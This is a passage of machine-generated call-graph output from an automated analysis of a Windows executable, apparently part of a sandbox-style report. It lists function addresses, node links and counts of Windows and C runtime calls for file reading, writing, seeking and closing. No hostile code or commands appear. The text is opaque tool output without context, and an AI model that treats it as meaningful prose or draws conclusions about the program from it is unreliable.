41e1f4 __write 51 API calls 87414->87415 87414->87418 87416 414f64 87415->87416 87417 41e1f4 __write 51 API calls 87416->87417 87416->87418 87417->87418 87418->87394 87420 414455 87419->87420 87421 414477 87419->87421 87420->87421 87422 414139 __fflush_nolock 46 API calls 87420->87422 87425 414139 87421->87425 87423 414470 87422->87423 87461 41b7b2 77 API calls 5 library calls 87423->87461 87426 414145 87425->87426 87427 41415a 87425->87427 87462 417f77 46 API calls __getptd_noexit 87426->87462 87427->87397 87429 41414a 87463 417f25 10 API calls wcstoxq 87429->87463 87431 414155 87431->87397 87433 41e200 __read 87432->87433 87434 41e223 87433->87434 87435 41e208 87433->87435 87437 41e22f 87434->87437 87440 41e269 87434->87440 87484 417f8a 46 API calls __getptd_noexit 87435->87484 87486 417f8a 46 API calls __getptd_noexit 87437->87486 87438 41e20d 87485 417f77 46 API calls __getptd_noexit 87438->87485 87464 41ae56 87440->87464 87442 41e234 87487 417f77 46 API calls __getptd_noexit 87442->87487 87445 41e26f 87447 41e291 87445->87447 87448 41e27d 87445->87448 87446 41e23c 87488 417f25 10 API calls wcstoxq 87446->87488 87489 417f77 46 API calls __getptd_noexit 87447->87489 87474 41e17f 87448->87474 87450 41e215 __read 87450->87393 87453 41e289 87491 41e2c0 LeaveCriticalSection __unlock_fhandle 87453->87491 87454 41e296 87490 417f8a 46 API calls __getptd_noexit 87454->87490 87457->87393 87458->87408 87459->87418 87460->87418 87461->87421 87462->87429 87463->87431 87465 41ae62 __read 87464->87465 87466 41aebc 87465->87466 87467 4182cb __lock 46 API calls 87465->87467 87468 41aec1 EnterCriticalSection 87466->87468 87469 41aede __read 87466->87469 87470 41ae8e 87467->87470 87468->87469 87469->87445 87471 41aeaa 87470->87471 87472 41ae97 InitializeCriticalSectionAndSpinCount 87470->87472 87473 41aeec ___lock_fhandle LeaveCriticalSection 87471->87473 87472->87471 87473->87466 87475 41aded __close_nolock 46 API calls 87474->87475 87476 41e18e 87475->87476 87477 41e1a4 SetFilePointer 87476->87477 87478 41e194 87476->87478 87480 41e1bb GetLastError 87477->87480 87481 41e1c3 87477->87481 87479 417f77 wcstoxq 46 API calls 87478->87479 87482 41e199 87479->87482 87480->87481 87481->87482 87483 417f9d __dosmaperr 46 API calls 87481->87483 87482->87453 87483->87482 87484->87438 87485->87450 87486->87442 87487->87446 87488->87450 87489->87454 87490->87453 87491->87450 87493 4149ea 87492->87493 87494 4149fe 87492->87494 87538 417f77 46 API calls __getptd_noexit 87493->87538 87497 4149fa 87494->87497 87498 41443c __flush 77 API calls 87494->87498 87496 4149ef 87539 417f25 10 API calls wcstoxq 87496->87539 87510 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87497->87510 87500 414a0a 87498->87500 87511 41d8c2 87500->87511 87503 414139 __fflush_nolock 46 API calls 87504 414a18 87503->87504 87515 41d7fe 87504->87515 87506 414a1e 87506->87497 87507 413748 _free 46 API calls 87506->87507 87507->87497 87508->87238 87509->87244 87510->87244 87512 414a12 87511->87512 87513 41d8d2 87511->87513 87512->87503 87513->87512 87514 413748 _free 46 API calls 87513->87514 87514->87512 87516 41d80a __read 87515->87516 87517 41d812 87516->87517 87518 41d82d 87516->87518 87555 417f8a 46 API calls __getptd_noexit 87517->87555 87519 41d839 87518->87519 87524 41d873 87518->87524 87557 417f8a 46 API calls __getptd_noexit 87519->87557 87522 41d817 87556 417f77 46 API calls __getptd_noexit 87522->87556 87523 41d83e 87558 417f77 46 API calls __getptd_noexit 87523->87558 87527 41ae56 ___lock_fhandle 48 API calls 87524->87527 87529 41d879 87527->87529 87528 41d846 87559 417f25 10 API calls wcstoxq 87528->87559 87531 41d893 87529->87531 87532 41d887 87529->87532 87560 417f77 46 API calls __getptd_noexit 87531->87560 87540 41d762 87532->87540 87534 41d81f __read 87534->87506 87536 41d88d 87561 41d8ba LeaveCriticalSection __unlock_fhandle 87536->87561 87538->87496 87539->87497 87562 41aded 87540->87562 87542 41d7c8 87575 41ad67 47 API calls 2 library calls 87542->87575 87544 41d772 87544->87542 87546 41aded __close_nolock 46 API calls 87544->87546 87554 41d7a6 87544->87554 87545 41d7d0 87551 41d7f2 87545->87551 87576 417f9d 46 API calls 3 library calls 87545->87576 87548 41d79d 87546->87548 87547 41aded __close_nolock 46 API calls 87549 41d7b2 CloseHandle 87547->87549 87552 41aded __close_nolock 46 API calls 87548->87552 87549->87542 87553 41d7be GetLastError 87549->87553 87551->87536 87552->87554 87553->87542 87554->87542 87554->87547 87555->87522 87556->87534 87557->87523 87558->87528 87559->87534 87560->87536 87561->87534 87563 41adfa 87562->87563 87565 41ae12 87562->87565 87564 417f8a __read 46 API calls 87563->87564 87567 41adff 87564->87567 87566 417f8a __read 46 API calls 87565->87566 87569 41ae51 87565->87569 87568 41ae23 87566->87568 87570 417f77 wcstoxq 46 API calls 87567->87570 87571 417f77 wcstoxq 46 API calls 87568->87571 87569->87544 87572 41ae07 87570->87572 87573 41ae2b 87571->87573 87572->87544 87574 417f25 wcstoxq 10 API calls 87573->87574 87574->87572 87575->87545 87576->87551 87578 414c82 __read 87577->87578 87579 414cc3 87578->87579 87580 414c96 setSBCS 87578->87580 87581 414cbb __read 87578->87581 87582 415471 __lock_file 47 API calls 87579->87582 87604 417f77 46 API calls __getptd_noexit 87580->87604 87581->87248 87583 414ccb 87582->87583 87590 414aba 87583->87590 87585 414cb0 87605 417f25 10 API calls wcstoxq 87585->87605 87594 414ad8 setSBCS 87590->87594 87596 414af2 87590->87596 87591 414ae2 87657 417f77 46 API calls __getptd_noexit 87591->87657 87593 414ae7 87658 417f25 10 API calls wcstoxq 87593->87658 87594->87591 87594->87596 87601 414b2d 87594->87601 87606 414cfa LeaveCriticalSection LeaveCriticalSection _fseek 87596->87606 87598 414c38 setSBCS 87660 417f77 46 API calls __getptd_noexit 87598->87660 87599 414139 __fflush_nolock 46 API calls 87599->87601 87601->87596 87601->87598 87601->87599 87607 41dfcc 87601->87607 87637 41d8f3 87601->87637 87659 41e0c2 46 API calls 3 library calls 87601->87659 87604->87585 87605->87581 87606->87581 87608 41dfd8 __read 87607->87608 87609 41dfe0 87608->87609 87610 41dffb 87608->87610 87730 417f8a 46 API calls __getptd_noexit 87609->87730 87612 41e007 87610->87612 87615 41e041 87610->87615 87732 417f8a 46 API calls __getptd_noexit 87612->87732 87613 41dfe5 87731 417f77 46 API calls __getptd_noexit 87613->87731 87619 41e063 87615->87619 87620 41e04e 87615->87620 87617 41e00c 87733 417f77 46 API calls __getptd_noexit 87617->87733 87624 41ae56 ___lock_fhandle 48 API calls 87619->87624 87735 417f8a 46 API calls __getptd_noexit 87620->87735 87621 41dfed __read 87621->87601 87622 41e014 87734 417f25 10 API calls wcstoxq 87622->87734 87626 41e069 87624->87626 87625 41e053 87736 417f77 46 API calls __getptd_noexit 87625->87736 87629 41e077 87626->87629 87630 41e08b 87626->87630 87661 41da15 87629->87661 87737 417f77 46 API calls __getptd_noexit 87630->87737 87633 41e083 87739 41e0ba LeaveCriticalSection __unlock_fhandle 87633->87739 87634 41e090 87738 417f8a 46 API calls __getptd_noexit 87634->87738 87638 41d900 87637->87638 87642 41d915 87637->87642 87743 417f77 46 API calls __getptd_noexit 87638->87743 87640 41d905 87744 417f25 10 API calls wcstoxq 87640->87744 87643 41d94a 87642->87643 87648 41d910 87642->87648 87740 420603 87642->87740 87645 414139 __fflush_nolock 46 API calls 87643->87645 87646 41d95e 87645->87646 87647 41dfcc __read 59 API calls 87646->87647 87649 41d965 87647->87649 87648->87601 87649->87648 87650 414139 __fflush_nolock 46 API calls 87649->87650 87651 41d988 87650->87651 87651->87648 87652 414139 __fflush_nolock 46 API calls 87651->87652 87653 41d994 87652->87653 87653->87648 87654 414139 __fflush_nolock 46 API calls 87653->87654 87655 41d9a1 87654->87655 87656 414139 __fflush_nolock 46 API calls 87655->87656 87656->87648 87657->87593 87658->87596 87659->87601 87660->87593 87662 41da31 87661->87662 87663 41da4c 87661->87663 87664 417f8a __read 46 API calls 87662->87664 87665 41da5b 87663->87665 87667 41da7a 87663->87667 87666 41da36 87664->87666 87668 417f8a __read 46 API calls 87665->87668 87670 417f77 wcstoxq 46 API calls 87666->87670 87669 41da98 87667->87669 87683 41daac 87667->87683 87671 41da60 87668->87671 87672 417f8a __read 46 API calls 87669->87672 87684 41da3e 87670->87684 87674 417f77 wcstoxq 46 API calls 87671->87674 87676 41da9d 87672->87676 87673 41db02 87675 417f8a __read 46 API calls 87673->87675 87677 41da67 87674->87677 87678 41db07 87675->87678 87679 417f77 wcstoxq 46 API calls 87676->87679 87680 417f25 wcstoxq 10 API calls 87677->87680 87681 417f77 wcstoxq 46 API calls 87678->87681 87682 41daa4 87679->87682 87680->87684 87681->87682 87686 417f25 wcstoxq 10 API calls 87682->87686 87683->87673 87683->87684 87685 41dae1 87683->87685 87687 41db1b 87683->87687 87684->87633 87685->87673 87692 41daec ReadFile 87685->87692 87686->87684 87689 416b04 __malloc_crt 46 API calls 87687->87689 87693 41db31 87689->87693 87690 41dc17 87691 41df8f GetLastError 87690->87691 87698 41dc2b 87690->87698 87694 41de16 87691->87694 87695 41df9c 87691->87695 87692->87690 87692->87691 87696 41db59 87693->87696 87697 41db3b 87693->87697 87704 417f9d __dosmaperr 46 API calls 87694->87704 87709 41dd9b 87694->87709 87700 417f77 wcstoxq 46 API calls 87695->87700 87699 420494 __lseeki64_nolock 48 API calls 87696->87699 87701 417f77 wcstoxq 46 API calls 87697->87701 87698->87709 87711 41de5b 87698->87711 87712 41dc47 87698->87712 87702 41db67 87699->87702 87703 41dfa1 87700->87703 87705 41db40 87701->87705 87702->87692 87706 417f8a __read 46 API calls 87703->87706 87704->87709 87707 417f8a __read 46 API calls 87705->87707 87706->87709 87707->87684 87708 413748 _free 46 API calls 87708->87684 87709->87684 87709->87708 87710 41ded0 ReadFile 87715 41deef GetLastError 87710->87715 87722 41def9 87710->87722 87711->87709 87711->87710 87713 41dcab ReadFile 87712->87713 87718 41dd28 87712->87718 87714 41dcc9 GetLastError 87713->87714 87721 41dcd3 87713->87721 87714->87712 87714->87721 87715->87711 87715->87722 87716 41ddec MultiByteToWideChar 87716->87709 87717 41de10 GetLastError 87716->87717 87717->87694 87718->87709 87719 41dda3 87718->87719 87720 41dd96 87718->87720 87724 41dd60 87718->87724 87719->87724 87725 41ddda 87719->87725 87723 417f77 wcstoxq 46 API calls 87720->87723 87721->87712 87726 420494 __lseeki64_nolock 48 API calls 87721->87726 87722->87711 87727 420494 __lseeki64_nolock 48 API calls 87722->87727 87723->87709 87724->87716 87728 420494 __lseeki64_nolock 48 API calls 87725->87728 87726->87721 87727->87722 87729 41dde9 87728->87729 87729->87716 87730->87613 87731->87621 87732->87617 87733->87622 87734->87621 87735->87625 87736->87622 87737->87634 87738->87633 87739->87621 87741 416b04 __malloc_crt 46 API calls 87740->87741 87742 420618 87741->87742 87742->87643 87743->87640 87744->87648 87748 4148b3 GetSystemTimeAsFileTime __aulldiv 87745->87748 87747 442c6b 87747->87251 87748->87747 87749->87258 87750->87263 87751->87263 87757 45272f __tzset_nolock _wcscpy 87752->87757 87753 414d04 61 API calls __fread_nolock 87753->87757 87754 44afef GetSystemTimeAsFileTime 87754->87757 87755 4528a4 87755->87173 87755->87174 87756 4150d1 81 API calls _fseek 87756->87757 87757->87753 87757->87754 87757->87755 87757->87756 87759 44b1bc 87758->87759 87760 44b1ca 87758->87760 87761 4149c2 116 API calls 87759->87761 87762 44b1e1 87760->87762 87763 4149c2 116 API calls 87760->87763 87764 44b1d8 87760->87764 87761->87760 87793 4321a4 87762->87793 87766 44b2db 87763->87766 87764->87201 87766->87762 87768 44b2e9 87766->87768 87767 44b224 87769 44b253 87767->87769 87770 44b228 87767->87770 87771 44b2f6 87768->87771 87773 414a46 __fcloseall 82 API calls 87768->87773 87797 43213d 87769->87797 87772 44b235 87770->87772 87775 414a46 __fcloseall 82 API calls 87770->87775 87771->87201 87776 44b245 87772->87776 87778 414a46 __fcloseall 82 API calls 87772->87778 87773->87771 87775->87772 87776->87201 87777 44b25a 87779 44b260 87777->87779 87780 44b289 87777->87780 87778->87776 87782 44b26d 87779->87782 87783 414a46 __fcloseall 82 API calls 87779->87783 87807 44b0bf 87 API calls 87780->87807 87784 44b27d 87782->87784 87786 414a46 __fcloseall 82 API calls 87782->87786 87783->87782 87784->87201 87785 44b28f 87808 4320f8 46 API calls _free 87785->87808 87786->87784 87788 44b295 87790 44b2a2 87788->87790 87791 414a46 __fcloseall 82 API calls 87788->87791 87789 44b2b2 87789->87201 87790->87789 87792 414a46 __fcloseall 82 API calls 87790->87792 87791->87790 87792->87789 87794 4321cb 87793->87794 87796 4321b4 __tzset_nolock _memmove 87793->87796 87795 414d04 __fread_nolock 61 API calls 87794->87795 87795->87796 87796->87767 87798 4135bb _malloc 46 API calls 87797->87798 87799 432150 87798->87799 87800 4135bb _malloc 46 API calls 87799->87800 87801 432162 87800->87801 87802 4135bb _malloc 46 API calls 87801->87802 87803 432174 87802->87803 87805 432189 87803->87805 87809 4320f8 46 API calls _free 87803->87809 87805->87777 87806 432198 87806->87777 87807->87785 87808->87788 87809->87806 87810->87102 87811->87106 87812->87124 87813->87124 87814->87124 87815->87118 87816->87124 87817->87124 87818->87128 87819->87137 87820->87139 87821->87139 87871 410160 87822->87871 87824 41012f GetFullPathNameW 87825 410147 ctype 87824->87825 87825->86959 87827 4102cb SHGetDesktopFolder 87826->87827 87830 410333 _wcsncpy 87826->87830 87828 4102e0 _wcsncpy 87827->87828 87827->87830 87829 41031c SHGetPathFromIDListW 87828->87829 87828->87830 87829->87830 87830->86961 87832 4101bb 87831->87832 87836 425f4a 87831->87836 87833 410160 52 API calls 87832->87833 87835 4101c7 87833->87835 87834 4114ab __wcsicoll 58 API calls 87834->87836 87875 410200 52 API calls 2 library calls 87835->87875 87836->87834 87838 425f6e 87836->87838 87838->86964 87839 4101d6 87876 410200 52 API calls 2 library calls 87839->87876 87841 4101e9 87841->86964 87843 40f760 128 API calls 87842->87843 87844 40f584 87843->87844 87845 429335 87844->87845 87846 40f58c 87844->87846 87849 4528bd 118 API calls 87845->87849 87847 40f598 87846->87847 87848 429358 87846->87848 87901 4033c0 113 API calls 7 library calls 87847->87901 87902 434034 86 API calls _wprintf 87848->87902 87851 42934b 87849->87851 87854 429373 87851->87854 87855 42934f 87851->87855 87853 40f5b4 87853->86962 87857 4115d7 52 API calls 87854->87857 87858 431e58 82 API calls 87855->87858 87856 429369 87856->87854 87870 4293c5 ctype 87857->87870 87858->87848 87859 42959c 87860 413748 _free 46 API calls 87859->87860 87861 4295a5 87860->87861 87862 431e58 82 API calls 87861->87862 87863 4295b1 87862->87863 87867 401b10 52 API calls 87867->87870 87870->87859 87870->87867 87877 444af8 87870->87877 87880 44b41c 87870->87880 87887 402780 87870->87887 87895 4022d0 87870->87895 87903 44c7dd 64 API calls 3 library calls 87870->87903 87872 410167 _wcslen 87871->87872 87873 4115d7 52 API calls 87872->87873 87874 41017e _wcscpy 87873->87874 87874->87824 87875->87839 87876->87841 87878 4115d7 52 API calls 87877->87878 87879 444b27 _memmove 87878->87879 87879->87870 87881 44b429 87880->87881 87882 4115d7 52 API calls 87881->87882 87883 44b440 87882->87883 87884 44b45e 87883->87884 87885 401b10 52 API calls 87883->87885 87884->87870 87886 44b453 87885->87886 87886->87870 87888 402827 87887->87888 87891 402790 ctype _memmove 87887->87891 87890 4115d7 52 API calls 87888->87890 87889 4115d7 52 API calls 87892 402797 87889->87892 87890->87891 87891->87889 87893 4027bd 87892->87893 87894 4115d7 52 API calls 87892->87894 87893->87870 87894->87893 87896 4022e0 87895->87896 87898 40239d 87895->87898 87897 4115d7 52 API calls 87896->87897 87896->87898 87899 402320 ctype 87896->87899 87897->87899 87898->87870 87899->87898 87900 4115d7 52 API calls 87899->87900 87900->87899 87901->87853 87902->87856 87903->87870 87905 402417 87904->87905 87906 402539 ctype 87904->87906 87905->87906 87907 4115d7 52 API calls 87905->87907 87906->86968 87908 402443 87907->87908 87909 4115d7 52 API calls 87908->87909 87910 4024b4 87909->87910 87910->87906 87912 4022d0 52 API calls 87910->87912 87933 402880 95 API calls 2 library calls 87910->87933 87912->87910 87917 401566 87913->87917 87914 401794 87934 40e9a0 90 API calls 87914->87934 87916 40167a 87918 4017c0 87916->87918 87935 45e737 90 API calls 3 library calls 87916->87935 87917->87914 87917->87916 87917->87917 87920 4010a0 52 API calls 87917->87920 87918->86970 87920->87917 87922 40bc70 52 API calls 87921->87922 87926 40d451 87922->87926 87923 40d50f 87938 410600 52 API calls 87923->87938 87925 40e0a0 52 API calls 87925->87926 87926->87923 87926->87925 87928 401b10 52 API calls 87926->87928 87929 40d519 87926->87929 87931 427c01 87926->87931 87936 40f310 53 API calls 87926->87936 87937 40d860 91 API calls 87926->87937 87928->87926 87929->86973 87939 45e737 90 API calls 3 library calls 87931->87939 87933->87910 87934->87916 87935->87918 87936->87926 87937->87926 87938->87929 87939->87929 87940->86986 87941->86987 87943 42c5fe 87942->87943 87957 4091c6 87942->87957 87944 40bc70 52 API calls 87943->87944 87943->87957 87945 42c64e InterlockedIncrement 87944->87945 87946 42c665 87945->87946 87951 42c697 87945->87951 87948 42c672 InterlockedDecrement Sleep InterlockedIncrement 87946->87948 87946->87951 87947 42c737 InterlockedDecrement 87949 42c74a 87947->87949 87948->87946 87948->87951 87952 408f40 VariantClear 87949->87952 87950 42c731 87950->87947 87951->87947 87951->87950 88235 408e80 87951->88235 87954 42c752 87952->87954 88244 410c60 VariantClear ctype 87954->88244 87956 42c6cf 88239 45340c 85 API calls 87956->88239 87957->87049 87959 42c6db 87960 402160 52 API calls 87959->87960 87961 42c6e5 87960->87961 88240 45340c 85 API calls 87961->88240 87963 42c6f1 88241 40d200 52 API calls 2 library calls 87963->88241 87965 42c6fb 88242 465124 53 API calls 87965->88242 87967 42c715 87968 42c76a 87967->87968 87969 42c719 87967->87969 87970 401b10 52 API calls 87968->87970 88243 46fe32 VariantClear 87969->88243 87972 42c77e 87970->87972 87973 401980 53 API calls 87972->87973 87979 42c796 87973->87979 87974 42c812 88246 46fe32 VariantClear 87974->88246 87976 42c82a InterlockedDecrement 88247 46ff07 54 API calls 87976->88247 87978 42c864 88248 45e737 90 API calls 3 library calls 87978->88248 87979->87974 87979->87978 88245 40ba10 52 API calls 2 library calls 87979->88245 87982 42c9ec 88291 47d33e 329 API calls 87982->88291 87984 42c9fe 88292 46feb1 VariantClear VariantClear 87984->88292 87986 401980 53 API calls 87996 42c849 87986->87996 87987 42ca08 87989 401b10 52 API calls 87987->87989 87988 408f40 VariantClear 87988->87996 87992 42ca15 87989->87992 87990 408f40 VariantClear 87993 42c891 87990->87993 87991 402780 52 API calls 87991->87996 88249 410c60 VariantClear ctype 87993->88249 87996->87982 87996->87986 87996->87988 87996->87991 88250 40a780 87996->88250 87998 42c874 87998->87990 87999 42ca59 87998->87999 87999->87999 88001 40afc4 88000->88001 88002 40b156 88000->88002 88003 40afd5 88001->88003 88004 42d1e3 88001->88004 88302 45e737 90 API calls 3 library calls 88002->88302 88007 40a780 192 API calls 88003->88007 88025 40b11a ctype 88003->88025 88303 45e737 90 API calls 3 library calls 88004->88303 88008 40b00a 88007->88008 88011 42d1f8 88008->88011 88014 40b012 88008->88014 88009 40b143 88009->87049 88013 408f40 VariantClear 88011->88013 88012 42d4db 88012->88012 88013->88009 88015 40b04a 88014->88015 88017 42d231 VariantClear 88014->88017 88018 40b094 ctype 88014->88018 88024 40b05c ctype 88015->88024 88304 40e270 VariantClear ctype 88015->88304 88016 40b108 88016->88025 88305 40e270 VariantClear ctype 88016->88305 88017->88024 88018->88016 88020 42d425 ctype 88018->88020 88019 42d45a VariantClear 88019->88025 88020->88019 88020->88025 88022 4115d7 52 API calls 88022->88018 88024->88018 88024->88022 88025->88009 88306 45e737 90 API calls 3 library calls 88025->88306 88027 408fff 88026->88027 88039 40900d 88026->88039 88307 403ea0 52 API calls __cinit 88027->88307 88030 42c3f6 88310 45e737 90 API calls 3 library calls 88030->88310 88032 4090f2 ctype 88032->87049 88033 42c44a 88312 45e737 90 API calls 3 library calls 88033->88312 88034 40a780 192 API calls 88034->88039 88035 42c47b 88313 451b42 61 API calls 88035->88313 88039->88030 88039->88032 88039->88033 88039->88034 88039->88035 88040 42c4cb 88039->88040 88041 42c564 88039->88041 88046 42c548 88039->88046 88048 4090df 88039->88048 88050 42c528 88039->88050 88051 409112 88039->88051 88053 4090ea 88039->88053 88309 4534e3 52 API calls 88039->88309 88311 40c4e0 192 API calls 88039->88311 88315 47faae 231 API calls 88040->88315 88042 408f40 VariantClear 88041->88042 88042->88032 88044 42c491 88044->88032 88314 45e737 90 API calls 3 library calls 88044->88314 88045 42c4da 88045->88032 88316 45e737 90 API calls 3 library calls 88045->88316 88318 45e737 90 API calls 3 library calls 88046->88318 88048->88053 88054 408e80 VariantClear 88048->88054 88317 45e737 90 API calls 3 library calls 88050->88317 88051->88046 88056 40912b 88051->88056 88057 408f40 VariantClear 88053->88057 88054->88053 88056->88032 88308 403e10 53 API calls 88056->88308 88057->88032 88059 40914b 88060 408f40 VariantClear 88059->88060 88060->88032 88319 408d90 88061->88319 88063 429778 88348 410c60 VariantClear ctype 88063->88348 88065 429780 88066 408cf9 88066->88063 88067 42976c 88066->88067 88069 408d2d 88066->88069 88347 45e737 90 API calls 3 library calls 88067->88347 88335 403d10 88069->88335 88072 408d71 ctype 88072->87049 88073 408d45 ctype 88073->88072 88074 408f40 VariantClear 88073->88074 88074->88073 88076 425c87 88075->88076 88077 40d15f 88075->88077 88078 425cc7 88076->88078 88079 425ca1 TranslateAcceleratorW 88076->88079 88077->87049 88079->88077 88081 42602f 88080->88081 88084 40d17f 88080->88084 88081->87049 88082 40d18c 88082->87049 88083 42608e IsDialogMessageW 88083->88082 88083->88084 88084->88082 88084->88083 88647 430c46 GetClassLongW 88084->88647 88087 4096c6 _wcslen 88086->88087 88088 4115d7 52 API calls 88087->88088 88149 40a70c ctype _memmove 88087->88149 88089 4096fa _memmove 88088->88089 88091 4115d7 52 API calls 88089->88091 88090 4013a0 52 API calls 88092 4297aa 88090->88092 88093 40971b 88091->88093 88094 4115d7 52 API calls 88092->88094 88095 409749 CharUpperBuffW 88093->88095 88097 40976a ctype 88093->88097 88093->88149 88137 4297d1 _memmove 88094->88137 88095->88097 88145 4097e5 ctype 88097->88145 88649 47dcbb 194 API calls 88097->88649 88099 408f40 VariantClear 88100 42ae92 88099->88100 88676 410c60 VariantClear ctype 88100->88676 88102 42aea4 88103 409aa2 88105 4115d7 52 API calls 88103->88105 88109 409afe 88103->88109 88103->88137 88104 40a689 88106 4115d7 52 API calls 88104->88106 88105->88109 88122 40a6af ctype _memmove 88106->88122 88107 40c2c0 52 API calls 88107->88145 88108 409b2a 88112 429dbe 88108->88112 88179 409b4d ctype _memmove 88108->88179 88657 40b400 VariantClear VariantClear ctype 88108->88657 88109->88108 88110 4115d7 52 API calls 88109->88110 88111 429d31 88110->88111 88114 429d42 88111->88114 88654 44a801 52 API calls 88111->88654 88116 429dd3 88112->88116 88658 40b400 VariantClear VariantClear ctype 88112->88658 88113 409fd2 88119 40a045 88113->88119 88173 42a3f5 88113->88173 88127 40e0a0 52 API calls 88114->88127 88116->88179 88659 40e1c0 VariantClear ctype 88116->88659 88117 429a46 VariantClear 88117->88145 88124 4115d7 52 API calls 88119->88124 88120 408f40 VariantClear 88120->88145 88129 4115d7 52 API calls 88122->88129 88130 40a04c 88124->88130 88126 4115d7 52 API calls 88126->88145 88131 429d57 88127->88131 88129->88149 88135 40a0a7 88130->88135 88139 4091e0 315 API calls 88130->88139 88655 453443 52 API calls 88131->88655 88133 42a42f 88663 45e737 90 API calls 3 library calls 88133->88663 88158 40a0af 88135->88158 88664 40c790 VariantClear ctype 88135->88664 88136 4299d9 88140 408f40 VariantClear 88136->88140 88675 45e737 90 API calls 3 library calls 88137->88675 88139->88135 88144 4299e2 88140->88144 88141 429abd 88141->87049 88142 429d88 88656 453443 52 API calls 88142->88656 88651 410c60 VariantClear ctype 88144->88651 88145->88103 88145->88104 88145->88107 88145->88117 88145->88120 88145->88122 88145->88126 88145->88136 88145->88137 88145->88141 88151 40a780 192 API calls 88145->88151 88152 42a452 88145->88152 88650 40c4e0 192 API calls 88145->88650 88652 40ba10 52 API calls 2 library calls 88145->88652 88653 40e270 VariantClear ctype 88145->88653 88149->88090 88151->88145 88152->88099 88153 402780 52 API calls 88153->88179 88154 44a801 52 API calls 88154->88179 88156 408f40 VariantClear 88187 40a162 ctype _memmove 88156->88187 88157 41130a 51 API calls __cinit 88157->88179 88159 40a11b 88158->88159 88161 42a4b4 VariantClear 88158->88161 88158->88187 88167 40a12d ctype 88159->88167 88665 40e270 VariantClear ctype 88159->88665 88160 4115d7 52 API calls 88160->88179 88161->88167 88162 40a780 192 API calls 88162->88179 88163 408e80 VariantClear 88163->88179 88165 401980 53 API calls 88165->88179 88166 4115d7 52 API calls 88166->88187 88167->88166 88167->88187 88168 408e80 VariantClear 88168->88187 88170 42a74d VariantClear 88170->88187 88171 40a368 88172 42aad4 88171->88172 88181 40a397 88171->88181 88668 46fe90 VariantClear VariantClear ctype 88172->88668 88662 47390f VariantClear 88173->88662 88174 42a886 VariantClear 88174->88187 88175 42a7e4 VariantClear 88175->88187 88176 40a3ce 88191 40a3d9 ctype 88176->88191 88669 40b400 VariantClear VariantClear ctype 88176->88669 88178 409c95 88178->87049 88179->88113 88179->88133 88179->88149 88179->88153 88179->88154 88179->88157 88179->88160 88179->88162 88179->88163 88179->88165 88179->88173 88179->88178 88660 45f508 52 API calls 88179->88660 88661 403e10 53 API calls 88179->88661 88180 40e270 VariantClear 88180->88187 88181->88176 88206 40a42c ctype 88181->88206 88648 40b400 VariantClear VariantClear ctype 88181->88648 88184 4115d7 52 API calls 88184->88187 88185 42abaf 88189 42abd4 VariantClear 88185->88189 88197 40a4ee ctype 88185->88197 88186 4115d7 52 API calls 88190 42a5a6 VariantInit VariantCopy 88186->88190 88187->88156 88187->88168 88187->88170 88187->88171 88187->88172 88187->88174 88187->88175 88187->88180 88187->88184 88187->88186 88666 470870 52 API calls 88187->88666 88667 44ccf1 VariantClear ctype 88187->88667 88188 40a4dc 88188->88197 88671 40e270 VariantClear ctype 88188->88671 88189->88197 88190->88187 88193 42a5c6 VariantClear 88190->88193 88192 40a41a 88191->88192 88199 42ab44 VariantClear 88191->88199 88191->88206 88192->88206 88670 40e270 VariantClear ctype 88192->88670 88193->88187 88194 42ac4f 88200 42ac79 VariantClear 88194->88200 88204 40a546 ctype 88194->88204 88197->88194 88198 40a534 88197->88198 88198->88204 88672 40e270 VariantClear ctype 88198->88672 88199->88206 88200->88204 88201 42ad28 88207 42ad4e VariantClear 88201->88207 88212 40a583 ctype 88201->88212 88204->88201 88205 40a571 88204->88205 88205->88212 88673 40e270 VariantClear ctype 88205->88673 88206->88185 88206->88188 88207->88212 88209 40a650 ctype 88209->87049 88210 42ae0e VariantClear 88210->88212 88212->88209 88212->88210 88674 40e270 VariantClear ctype 88212->88674 88213->87049 88214->86997 88215->87002 88216->87049 88217->87049 88218->87049 88219->87049 88220->87054 88221->87054 88222->87054 88223->87054 88224->87054 88225->87054 88226->87054 88228 403cdf 88227->88228 88229 408f40 VariantClear 88228->88229 88230 403ce7 88229->88230 88230->87042 88231->87054 88232->87054 88233->87049 88234->86994 88236 408e88 88235->88236 88238 408e94 88235->88238 88237 408f40 VariantClear 88236->88237 88237->88238 88238->87956 88238->88238 88239->87959 88240->87963 88241->87965 88242->87967 88243->87950 88244->87957 88245->87979 88246->87976 88247->87996 88248->87998 88249->87957 88251 40a7a6 88250->88251 88252 40ae8c 88250->88252 88254 4115d7 52 API calls 88251->88254 88293 41130a 51 API calls __cinit 88252->88293 88287 40a7c6 ctype _memmove 88254->88287 88255 40a86d 88256 40abd1 88255->88256 88275 40a878 ctype 88255->88275 88298 45e737 90 API calls 3 library calls 88256->88298 88258 401b10 52 API calls 88258->88287 88259 42b791 VariantClear 88259->88287 88260 40b5f0 89 API calls 88260->88287 88261 408e80 VariantClear 88261->88287 88262 42ba2d VariantClear 88262->88287 88263 408f40 VariantClear 88263->88275 88264 42b459 VariantClear 88264->88287 88265 40a884 ctype 88265->87996 88266 40bc10 53 API calls 88266->88287 88267 408cc0 185 API calls 88267->88287 88269 42b6f6 VariantClear 88269->88287 88271 40e270 VariantClear 88271->88287 88272 4115d7 52 API calls 88272->88287 88273 42bbf5 88299 45e737 90 API calls 3 library calls 88273->88299 88274 42bb6a 88301 44b92d VariantClear 88274->88301 88275->88263 88275->88265 88276 4115d7 52 API calls 88278 42b5b3 VariantInit VariantCopy 88276->88278 88281 42b5d7 VariantClear 88278->88281 88278->88287 88280 408f40 VariantClear 88280->88287 88281->88287 88284 42bc37 88300 45e737 90 API calls 3 library calls 88284->88300 88287->88255 88287->88256 88287->88258 88287->88259 88287->88260 88287->88261 88287->88262 88287->88264 88287->88266 88287->88267 88287->88269 88287->88271 88287->88272 88287->88273 88287->88274 88287->88276 88287->88280 88287->88284 88290 4530c9 VariantClear 88287->88290 88294 45308a 53 API calls 88287->88294 88295 470870 52 API calls 88287->88295 88296 457f66 87 API calls __write_nolock 88287->88296 88297 472f47 127 API calls 88287->88297 88290->88287 88291->87984 88292->87987 88293->88287 88294->88287 88295->88287 88296->88287 88297->88287 88298->88274 88299->88274 88302->88004 88303->88011 88304->88024 88305->88025 88306->88012 88307->88039 88308->88059 88309->88039 88310->88032 88311->88039 88312->88032 88313->88044 88314->88032 88315->88045 88316->88032 88317->88032 88318->88041 88320 4289d2 88319->88320 88321 408db3 88319->88321 88351 45e737 90 API calls 3 library calls 88320->88351 88349 40bec0 90 API calls 